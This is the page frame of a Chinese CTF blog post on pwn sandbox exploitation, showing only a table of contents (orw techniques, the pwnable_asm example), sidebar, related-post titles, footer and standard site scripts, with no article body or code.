          <ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#%E6%B2%99%E7%9B%92%E5%88%A9%E7%94%A8"><span class="toc-number">1.</span> <span class="toc-text"> 沙盒利用</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%B2%99%E7%9B%92"><span class="toc-number">1.1.</span> <span class="toc-text"> 沙盒</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%B8%B8%E8%A7%81%E5%87%BD%E6%95%B0"><span class="toc-number">1.2.</span> <span class="toc-text"> 常见函数</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%B8%B8%E7%94%A8%E5%B7%A5%E5%85%B7"><span class="toc-number">1.3.</span> <span class="toc-text"> 常用工具</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#orwp-%E5%87%BD%E6%95%B0%E5%8F%82%E6%95%B0%E7%9A%84%E6%B7%B1%E5%85%A5"><span class="toc-number">1.4.</span> <span class="toc-text"> orw&#x2F;p 函数参数的深入</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E4%BE%8B%E9%A2%98"><span class="toc-number">1.5.</span> <span class="toc-text"> 例题</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#pwnable_asm"><span class="toc-number">1.5.1.</span> <span class="toc-text"> pwnable_asm</span></a></li></ol></li></ol></li></ol>
      </div>
      <div class="related panel pjax" data-title="Related">
      </div>
      <div class="overview panel" data-title="Overview">
        <div class="author" itemprop="author" itemscope itemtype="http://schema.org/Person">
  <img class="image" itemprop="image" alt="岚沐"
      data-src="/images/avatar.jpg">
  <p class="name" itemprop="name">岚沐</p>
  <div class="description" itemprop="description"></div>
</div>

<nav class="state">
    <div class="item posts">
      <a href="/archives/">
        <span class="count">8</span>
        <span class="name">posts</span>
      </a>
    </div>
    <div class="item tags">
      <a href="/tags/">
        <span class="count">3</span>
        <span class="name">tags</span>
      </a>
    </div>
</nav>

<div class="social">
</div>

<ul class="menu">
  
    
  <li class="item">
    <a href="/" rel="section"><i class="ic i-home"></i>Home</a>
  </li>

    
  <li class="item">
    <a href="/about/" rel="section"><i class="ic i-user"></i>About</a>
  </li>

    
  <li class="item">
    <a href="/friends/" rel="section"><i class="ic i-heart"></i>friends</a>
  </li>


</ul>

      </div>
    </div>
  </div>

  <ul id="quick">
    <li class="prev pjax">
        <a href="/2022/05/08/hello-world/" rel="prev" title="Previous Post"><i class="ic i-chevron-left"></i></a>
    </li>
    <li class="up"><i class="ic i-arrow-up"></i></li>
    <li class="down"><i class="ic i-arrow-down"></i></li>
    <li class="next pjax">
        <a href="/2022/05/17/Misc1/" rel="next" title="Next Post"><i class="ic i-chevron-right"></i></a>
    </li>
    <li class="percent"></li>
  </ul>
</div>


        </div>
        <div class="dimmer"></div>
      </div>
    </main>
    <footer id="footer">
      <div class="inner">
        <div class="widgets">
          
<div class="rpost pjax">
  <h2>Random Posts</h2>
  <ul>
      
  <li class="item">
    
<div class="breadcrumb">
</div>

    <span><a href="/2022/08/27/%E7%BD%91%E9%BC%8E%E6%9D%AFre%E3%80%81Crypto/" title="网鼎杯re、Crypto">网鼎杯re、Crypto</a></span>
  </li>

      
  <li class="item">
    
<div class="breadcrumb">
</div>

    <span><a href="/2022/05/08/hello-world/" title="Hello World">Hello World</a></span>
  </li>

      
  <li class="item">
    
<div class="breadcrumb">
</div>

    <span><a href="/2022/08/07/Lucky-7-%E4%BA%8C%E5%85%83%E9%9D%9E%E7%BA%BF%E6%80%A7%E5%90%8C%E4%BD%99%E6%96%B9%E7%A8%8B%E7%BB%84/" title="Lucky 7 二元非线性同余方程组">Lucky 7 二元非线性同余方程组</a></span>
  </li>

      
  <li class="item">
    
<div class="breadcrumb">
</div>

    <span><a href="/2022/08/02/%E5%BC%BA%E7%BD%91%E6%9D%AF-polydiv/" title="强网杯-polydiv">强网杯-polydiv</a></span>
  </li>

      
  <li class="item">
    
<div class="breadcrumb">
</div>

    <span><a href="/2022/05/17/Misc1/" title="Misc1">Misc1</a></span>
  </li>

      
  <li class="item">
    
<div class="breadcrumb">
</div>

    <span><a href="/2022/08/24/%E9%95%BF%E5%9F%8E%E6%9D%AFCrypto/" title="长城杯Crypto">长城杯Crypto</a></span>
  </li>

      
  <li class="item">
    
<div class="breadcrumb">
</div>

    <span><a href="/2022/05/10/pwn-sandbox1/" title="pwn-sandbox1">pwn-sandbox1</a></span>
  </li>

      
  <li class="item">
    
<div class="breadcrumb">
</div>

    <span><a href="/2022/07/06/sql%E6%B3%A8%E5%85%A5%E5%AD%A6%E4%B9%A0/" title="sql注入学习">sql注入学习</a></span>
  </li>

  </ul>
</div>
<div>
  <h2>Recent Comments</h2>
  <ul class="leancloud-recent-comment"></ul>
</div>

        </div>
        <div class="status">
  <div class="copyright">
    
    &copy; 2010 – 
    <span itemprop="copyrightYear">2022</span>
    <span class="with-love">
      <i class="ic i-sakura rotate"></i>
    </span>
    <span class="author" itemprop="copyrightHolder">岚沐 @ Arashimuのblog</span>
  </div>
  <div class="powered-by">
    Powered by <span class="exturl" data-url="aHR0cHM6Ly9oZXhvLmlv">Hexo</span> & Theme.<span class="exturl" data-url="aHR0cHM6Ly9naXRodWIuY29tL2FtZWhpbWUvaGV4by10aGVtZS1zaG9rYQ==">Shoka</span>
  </div>
</div>

      </div>
    </footer>
  </div>
<script data-config type="text/javascript">
  var LOCAL = {
    path: '2022/05/10/pwn-sandbox1/',
    favicon: {
      show: "（●´3｀●）Goooood",
      hide: "(´Д｀)Booooom"
    },
    search : {
      placeholder: "Search for Posts",
      empty: "We didn't find any results for the search: ${query}",
      stats: "${hits} results found in ${time} ms"
    },
    valine: true,fancybox: true,
    copyright: 'Copied to clipboard successfully! <br> All articles in this blog are licensed under <i class="ic i-creative-commons"></i>BY-NC-SA.',
    ignores : [
      function(uri) {
        return uri.includes('#');
      },
      function(uri) {
        return new RegExp(LOCAL.path+"$").test(uri);
      }
    ]
  };
</script>

<script src="https://cdn.polyfill.io/v2/polyfill.js"></script>

<script src="//cdn.jsdelivr.net/combine/npm/pace-js@1.0.2/pace.min.js,npm/pjax@0.2.8/pjax.min.js,npm/whatwg-fetch@3.4.0/dist/fetch.umd.min.js,npm/animejs@3.2.0/lib/anime.min.js,npm/algoliasearch@4/dist/algoliasearch-lite.umd.js,npm/instantsearch.js@4/dist/instantsearch.production.min.js,npm/lozad@1/dist/lozad.min.js,npm/quicklink@2/dist/quicklink.umd.js"></script>

<script src="/js/app.js?v=0.2.5"></script>




</body>
</html>
